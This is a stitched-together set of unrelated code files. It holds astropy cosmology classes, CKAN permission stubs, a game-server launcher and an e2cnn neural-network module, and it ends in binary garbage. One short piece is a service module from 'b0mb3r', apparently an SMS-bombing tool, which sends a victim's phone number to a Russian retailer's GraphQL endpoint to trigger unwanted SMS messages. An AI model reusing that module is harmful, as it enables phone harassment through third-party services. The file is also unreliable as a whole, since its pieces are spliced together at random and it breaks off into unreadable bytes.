hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import wCDM >>> cosmo = wCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) @property def w0(self): """ Dark energy equation of state""" return self._w0 def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_0`. """ return self._w0 * np.ones_like(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by :math:`I = \\left(1 + z\\right)^{3\\left(1 + w_0\\right)}` """ if isiterable(z): z = np.asarray(z) return (1.0 + z) ** (3 * (1 + self._w0)) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * zp1 ** (3.0 * (1 + w0))) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * zp1 ** (3 * (1 + w0))) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, w0={4:.3g}, "\ "Tcmb0={5:.4g}, Neff={6:.3g}, m_nu={7:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class FlatwCDM(wCDM): """FLRW cosmology with a constant dark energy equation of state and no spatial curvature. This has one additional attribute beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. w0 : float Dark energy equation of state at all redshifts. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import FlatwCDM >>> cosmo = FlatwCDM(H0=70, Om0=0.3, w0=-0.9) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, w0=-1., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, w0 = self._Om0, self._Ode0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0 * zp1 ** (3.0 * (1 + w0))) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0 * zp1 ** (3 * (1 + w0))) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, w0={3:.3g}, Tcmb0={4:.4g}, "\ "Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class w0waCDM(FLRW): """FLRW cosmology with a CPL dark energy equation of state and curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003): :math:`w(z) = w_0 + w_a (1-a) = w_0 + w_a z / (1+z)`. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0 (a=1). This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import w0waCDM >>> cosmo = w0waCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wa=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., wa=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) self._wa = float(wa) @property def w0(self): """ Dark energy equation of state at z=0""" return self._w0 @property def wa(self): """ Negative derivative of dark energy equation of state w.r.t. a""" return self._wa def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_0 + w_a (1 - a) = w_0 + w_a \\frac{z}{1+z}`. """ if isiterable(z): z = np.asarray(z) return self._w0 + self._wa * z / (1.0 + z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by .. math:: I = \\left(1 + z\\right)^{3 \\left(1 + w_0 + w_a\\right)} \exp \\left(-3 w_a \\frac{z}{1+z}\\right) """ if isiterable(z): z = np.asarray(z) zp1 = 1.0 + z return zp1 ** (3 * (1 + self._w0 + self._wa)) * \ np.exp(-3 * self._wa * z / zp1) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, "\ "Ode0={3:.3g}, w0={4:.3g}, wa={5:.3g}, Tcmb0={6:.4g}, "\ "Neff={7:.3g}, m_nu={8:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._w0, self._wa, self._Tcmb0, self._Neff, self.m_nu) class Flatw0waCDM(w0waCDM): """FLRW cosmology with a CPL dark energy equation of state and no curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003): :math:`w(z) = w_0 + w_a (1-a) = w_0 + w_a z / (1+z)`. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0 (a=1). This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import Flatw0waCDM >>> cosmo = Flatw0waCDM(H0=70, Om0=0.3, w0=-0.9, wa=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, w0=-1., wa=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 self._w0 = float(w0) self._wa = float(wa) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, "\ "w0={3:.3g}, Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class wpwaCDM(FLRW): """FLRW cosmology with a CPL dark energy equation of state, a pivot redshift, and curvature. The equation for the dark energy equation of state uses the CPL form as described in Chevallier & Polarski Int. J. Mod. Phys. D10, 213 (2001) and Linder PRL 90, 91301 (2003), but modified to have a pivot redshift as in the findings of the Dark Energy Task Force (Albrecht et al. arXiv:0901.0721 (2009)): :math:`w(a) = w_p + w_a (a_p - a) = w_p + w_a( 1/(1+zp) - 1/(1+z) )`. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. wp : float Dark energy equation of state at the pivot redshift zp. This is pressure/density for dark energy in units where c=1. wa : float Negative derivative of the dark energy equation of state with respect to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0. zp : float Pivot redshift -- the redshift where w(z) = wp Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import wpwaCDM >>> cosmo = wpwaCDM(H0=70,Om0=0.3,Ode0=0.7,wp=-0.9,wa=0.2,zp=0.4) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, wp=-1., wa=0., zp=0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._wp = float(wp) self._wa = float(wa) self._zp = float(zp) @property def wp(self): """ Dark energy equation of state at the pivot redshift zp""" return self._wp @property def wa(self): """ Negative derivative of dark energy equation of state w.r.t. a""" return self._wa @property def zp(self): """ The pivot redshift, where w(z) = wp""" return self._zp def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_p + w_a (a_p - a)` where :math:`a = 1/1+z` and :math:`a_p = 1 / 1 + z_p`. """ if isiterable(z): z = np.asarray(z) apiv = 1.0 / (1.0 + self._zp) return self._wp + self._wa * (apiv - 1.0 / (1. + z)) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by .. math:: a_p = \\frac{1}{1 + z_p} I = \\left(1 + z\\right)^{3 \\left(1 + w_p + a_p w_a\\right)} \exp \\left(-3 w_a \\frac{z}{1+z}\\right) """ if isiterable(z): z = np.asarray(z) zp1 = 1.0 + z apiv = 1.0 / (1.0 + self._zp) return zp1 ** (3 * (1 + self._wp + apiv * self._wa)) * \ np.exp(-3 * self._wa * z / zp1) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, wp={4:.3g}, "\ "wa={5:.3g}, zp={6:.3g}, Tcmb0={7:.4g}, Neff={8:.3g}, "\ "m_nu={9:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._wp, self._wa, self._zp, self._Tcmb0, self._Neff, self.m_nu) class w0wzCDM(FLRW): """FLRW cosmology with a variable dark energy equation of state and curvature. The equation for the dark energy equation of state uses the simple form: :math:`w(z) = w_0 + w_z z`. This form is not recommended for z > 1. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. Ok0 : float Omega curvature: equivalent curvature density in units of the critical density at z=0. w0 : float Dark energy equation of state at z=0. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. wz : float Derivative of the dark energy equation of state with respect to z. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : float or ndarray or astropy.units.Quantity Mass of each neutrino species, in eV. If this is a float or scalar Quantity, then all neutrino species are assumed to have that mass. If a ndarray or array Quantity, then these are the values of the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import w0wzCDM >>> cosmo = w0wzCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wz=0.2) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., wz=0., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) self._wz = float(wz) @property def w0(self): """ Dark energy equation of state at z=0""" return self._w0 @property def wz(self): """ Derivative of the dark energy equation of state w.r.t. z""" return self._wz def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is given by :math:`w(z) = w_0 + w_z z`. """ if isiterable(z): z = np.asarray(z) return self._w0 + self._wz * z def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by .. math:: I = \\left(1 + z\\right)^{3 \\left(1 + w_0 - w_z\\right)} \exp \\left(-3 w_z z\\right) """ if isiterable(z): z = np.asarray(z) zp1 = 1.0 + z return zp1 ** (3 * (1 + self._w0 - self._wz)) *\ np.exp(-3 * self._wz * z) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, "\ "Ode0={3:.3g}, w0={4:.3g}, wz={5:.3g} Tcmb0={6:.4g}, "\ "Neff={7:.3g}, m_nu={8:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._w0, self._wz, self._Tcmb0, self._Neff, self.m_nu) # Pre-defined cosmologies. This loops over the parameter sets in the # parameters module and creates a LambdaCDM or FlatLambdaCDM instance # with the same name as the parameter set in the current module's namespace. # Note this assumes all the cosmologies in parameters are LambdaCDM, # which is true at least as of this writing. for key in parameters.available: par = getattr(parameters, key) if par['flat']: cosmo = FlatLambdaCDM(par['H0'], par['Om0'], Tcmb0=par['Tcmb0'], Neff=par['Neff'], m_nu=u.Quantity(par['m_nu'], u.eV), name=key) cosmo.__doc__ = "%s instance of FlatLambdaCDM cosmology\n\n(from %s)" % (key, par['reference']) else: cosmo = LambdaCDM(par['H0'], par['Om0'], par['Ode0'], Tcmb0=par['Tcmb0'], Neff=par['Neff'], m_nu=u.Quantity(par['m_nu'], u.eV), name=key) cosmo.__doc__ = "%s instance of LambdaCDM cosmology\n\n(from %s)" % (key, par['reference']) setattr(sys.modules[__name__], key, cosmo) # don't leave these variables floating around in the namespace del key, par, cosmo ######################################################################### # The variable below contains the current cosmology used by the # convenience functions below and by other astropy functions if no # cosmology is explicitly given. It can be set with set_current() and # should be accessed using get_current(). ######################################################################### def get_cosmology_from_string(arg): """ Return a cosmology instance from a string. """ if arg == 'no_default': cosmo = None else: try: cosmo = getattr(sys.modules[__name__], arg) except AttributeError: s = "Unknown cosmology '%s'. Valid cosmologies:\n%s" % ( arg, parameters.available) raise ValueError(s) return cosmo _current = get_cosmology_from_string(DEFAULT_COSMOLOGY()) def get_current(): """ Get the current cosmology. If no current has been set, the WMAP9 comology is returned and a warning is given. Returns ------- cosmo : `Cosmology` instance See Also -------- set_current : sets the current cosmology """ if _current is None: warnings.warn('No default cosmology has been specified, ' 'using 9-year WMAP.', AstropyUserWarning) return WMAP9 return _current def set_current(cosmo): """ Set the current cosmology. Call this with an empty string ('') to get a list of the strings that map to available pre-defined cosmologies. .. warning:: `set_current` is the only way to change the current cosmology at runtime! The current cosmology can also be read from an option in the astropy configuration file when astropy.cosmology is first imported. However, any subsequent changes to the cosmology configuration option using `ConfigurationItem.set ` at run-time will not update the current cosmology. Parameters ---------- cosmo : str or `Cosmology` instance The cosmology to use. See Also -------- get_current : returns the currently-set cosmology """ global _current if isinstance(cosmo, basestring): _current = get_cosmology_from_string(cosmo) elif isinstance(cosmo, Cosmology): _current = cosmo else: raise ValueError( "Argument must be a string or cosmology instance. Valid strings:" "\n%s" % parameters.available) from ckan.common import _ def hdx_qa_dashboard_show(context, data_dict): return {'success': False, 'msg': _('Only sysadmins/qa officers can view the qa dashboard')} def hdx_qa_sdcmicro_run(context, data_dict): return {'success': False, 'msg': _('Only sysadmins can run the sdc micro check')} def hdx_qa_pii_run(context, data_dict): return {'success': False, 'msg': _('Only sysadmins can run the sdc micro check')} from koala.server import koala_host import sample.player import sample.account from sample.account import * import os koala_host.init_server(globals().copy(), f"{os.getcwd()}/sample/app.yaml") koala_host.use_pd() koala_host.register_user_handler( RequestAccountLogin, process_gateway_account_login) koala_host.run_server() from b0mb3r.services.service import Service class Ollis(Service): async def run(self): await self.post( "https://www.ollis.ru/gql", json={ "query": 'mutation { phone(number:"%s", locale:ru) { token error { code message } } }' % self.formatted_phone }, ) 0 from typing import List, Tuple, Any import numpy as np from collections import defaultdict from e2cnn.gspaces import * from e2cnn.nn import FieldType from e2cnn.nn import GeometricTensor from ..equivariant_module import EquivariantModule from .gated1 import GATED_ID, GATES_ID import torch from torch.nn import Parameter __all__ = ["InducedGatedNonLinearity1"] class InducedGatedNonLinearity1(EquivariantModule): def __init__(self, in_type, gates = None, drop_gates = True, **kwargs): r""" Induced Gated non-linearities. .. todo:: complete documentation! .. note:: Make sure all induced gate and gates have same subgroup Args: in_type (FieldType): the input field type gates (list, optional): list of strings specifying which field in input is a gate and which is a gated field drop_gates (bool, optional): if ``True`` (default), drop the trivial fields after using them to compute the gates. If ``False``, the gates are stacked with the gated fields in the output """ assert isinstance(in_type.gspace, GeneralOnR2) if gates is None: assert len(in_type) % 2 == 0 g = len(in_type) // 2 gates = [GATES_ID] * g + [GATED_ID] * g assert len(gates) == len(in_type) super(InducedGatedNonLinearity1, self).__init__() self.space = in_type.gspace self.in_type = in_type self.drop_gates = drop_gates self._contiguous = {} _input_indices = defaultdict(lambda: []) _output_indices = defaultdict(lambda: []) self._nfields = defaultdict(int) self.branching = None for g, r in zip(gates, in_type.representations): if g == GATES_ID: assert ( "induced_gate" in r.supported_nonlinearities ), 'Error! Representation "{}" can\'t be a "gate"'.format(r.name) elif g == GATED_ID: for nl in r.supported_nonlinearities: if nl.startswith("induced_gated"): break else: raise ValueError( 'Error! Representation "{}" does not support "gated"' " non-linearity".format(r.name) ) else: raise ValueError('Error! "{}" type not recognized'.format(g)) ngates = len([g for g in gates if g == GATES_ID]) ngated = len([g for g in gates if g == GATED_ID]) assert ngates == ngated, ( "Error! Number of gates ({}) does not match the number of gated" " non-linearities required ({})".format(ngates, ngated) ) quotient_size = None for g, r in zip(gates, in_type): if g == GATES_ID: if quotient_size is None: quotient_size = r.size else: assert r.size == quotient_size subfield_sizes = {} for g, r in zip(gates, in_type): if g == GATED_ID: subfield_size = None for nl in r.supported_nonlinearities: if nl.startswith("induced_gated"): assert subfield_size is None, ( "Error! The representation supports multiple " "sub-fields of different sizes" ) subfield_size = int(nl.split("_")[-1]) assert r.size % subfield_size == 0 assert r.size // subfield_size == quotient_size subfield_sizes[r.name] = subfield_size self.quotient_size = quotient_size if self.drop_gates: # only gated fields are preserved # therefore, the output representation is computed from the input one, removing the gates self.out_type = in_type.index_select( [i for i, g in enumerate(gates) if g == GATED_ID] ) else: self.out_type = in_type in_last_position = 0 out_last_position = 0 last_type = None # group fields by their type (gated or gate) and their size, check if fields of the same type are # contiguous and retrieve the indices of the fields for g, r in zip(gates, in_type.representations): if g == GATES_ID: type = g else: type = r.size, subfield_sizes[r.name] self._nfields[type] += 1 if type != last_type: if not type in self._contiguous: self._contiguous[type] = True else: self._contiguous[type] = False last_type = type _input_indices[type] += list( range(in_last_position, in_last_position + r.size) ) in_last_position += r.size if g != GATES_ID or not self.drop_gates: # since gates are discarded in output, the position on the output fiber is shifted # only when a gated field is met _output_indices[type] += list( range(out_last_position, out_last_position + r.size) ) out_last_position += r.size _input_indices = dict(_input_indices) # if self.drop_gates: _output_indices = dict(_output_indices) # else: # self._output_indices = self._input_indices for t, contiguous in self._contiguous.items(): if contiguous: # for contiguous fields, only the first and last indices are kept _input_indices[t] = torch.LongTensor( [min(_input_indices[t]), max(_input_indices[t]) + 1] ) if t != GATES_ID or not self.drop_gates: _output_indices[t] = torch.LongTensor( [min(_output_indices[t]), max(_output_indices[t]) + 1] ) else: # otherwise, transform the list of indices into a tensor _input_indices[t] = torch.LongTensor(_input_indices[t]) if t != GATES_ID or not self.drop_gates: _output_indices[t] = torch.LongTensor(_output_indices[t]) # register the indices tensors as parameters of this module self.register_buffer("input_indices_{}".format(t), _input_indices[t]) if t != GATES_ID or not self.drop_gates: self.register_buffer("output_indices_{}".format(t), _output_indices[t]) # gates need to be distinguished from gated fields _gates_indices = _input_indices.pop(GATES_ID) self.register_buffer("gates_indices", _gates_indices) # build a sorted list of the fields groups, such that every time they are iterated through in the same order self._order = sorted(_input_indices.keys()) # the bias for the gates self.bias = Parameter( torch.randn(1, ngates, 1, 1, 1, dtype=torch.float), requires_grad=True ) def forward(self, input): r""" Apply the gated non-linearity to the input feature map. Args: input (GeometricTensor): the input feature map Returns: the resulting feature map """ assert isinstance(input, GeometricTensor) assert input.type == self.in_type # retrieve the gates if self._contiguous[GATES_ID]: gates = input.tensor[:, self.gates_indices[0] : self.gates_indices[1], ...] else: gates = input.tensor[:, self.gates_indices, ...] # retrieving only gated fields from the joint tensor is worthless input = input.tensor b, c, h, w = input.shape # transform the gates gates = torch.sigmoid(gates.view(b, -1, self.quotient_size, h, w) - self.bias) # build the output tensor output = torch.empty( b, self.out_type.size, h, w, dtype=torch.float, device=self.bias.device ) if not self.drop_gates: # copy the gates in the output if self._contiguous[GATES_ID]: output[:, self.gates_indices[0] : self.gates_indices[1], ...] = gates else: output[:, self.gates_indices, ...] = gates next_gate = 0 # for each field size for type in self._order: size, subfield_size = type # retrieve the needed gates g = gates[:, next_gate : next_gate + self._nfields[type], ...].view( b, -1, 1, h, w ) input_indices = getattr(self, f"input_indices_{type}") output_indices = getattr(self, f"output_indices_{type}") if self._contiguous[type]: # if the fields were contiguous, we can use slicing output[:, output_indices[0] : output_indices[1], ...] = ( input[:, input_indices[0] : input_indices[1], ...].view( b, -1, subfield_size, h, w ) * g ).view(b, -1, h, w) else: # otherwise we have to use indexing output[:, output_indices, :, :] = ( input[:, input_indices, ...].view(b, -1, subfield_size, h, w) * g ).view(b, -1, h, w) # shift the position on the gates fiber next_gate += self._nfields[type] # wrap the result in a GeometricTensor return GeometricTensor(output, self.out_type) def evaluate_output_shape(self, input_shape): assert len(input_shape) == 4 assert input_shape[1] == self.in_type.size b, c, hi, wi = input_shape return b, self.out_type.size, hi, wi def check_equivariance(self, atol = 1e-6, rtol = 1e-5): c = self.in_type.size x = torch.randn(3, c, 10, 10) x = GeometricTensor(x, self.in_type) errors = [] for el in self.space.testing_elements: out1 = self(x).transform_fibers(el) out2 = self(x.transform_fibers(el)) errs = (out1.tensor - out2.tensor).detach().numpy() errs = np.abs(errs).reshape(-1) print(el, errs.max(), errs.mean(), errs.var()) assert torch.allclose(out1.tensor, out2.tensor, atol=atol, rtol=rtol), ( 'The error found during equivariance check with element "{}" is too' " high: max = {}, mean = {} var ={}".format( el, errs.max(), errs.mean(), errs.var() ) ) errors.append((el, errs.mean())) return errors &9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv������� ! 4 G Z m � � � � � � �   + > Q d w � � � � � � �  " 5 H [ n � � � � � � �   , ? R e x � � � � � � �  # 6 I \ o � � � � � � � -@Sfy�������$7J]p�������.ATgz�������%8K^q������� /BUh{������&9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv�������!4GZm�������+>Qdw�������"5H[n�������,?Rex������� # 6 I \ o � � � � � � � !!-!@!S!f!y!�!�!�!�!�!�!�!"$"7"J"]"p"�"�"�"�"�"�"�"##.#A#T#g#z#�#�#�#�#�#�#�#$%$8$K$^$q$�$�$�$�$�$�$�$ %%/%B%U%h%{%�%�%�%�%�%�%&&&&9&L&_&r&�&�&�&�&�&�&�& ''0'C'V'i'|'�'�'�'�'�'�'(('(:(M(`(s(�(�(�(�(�(�(�( 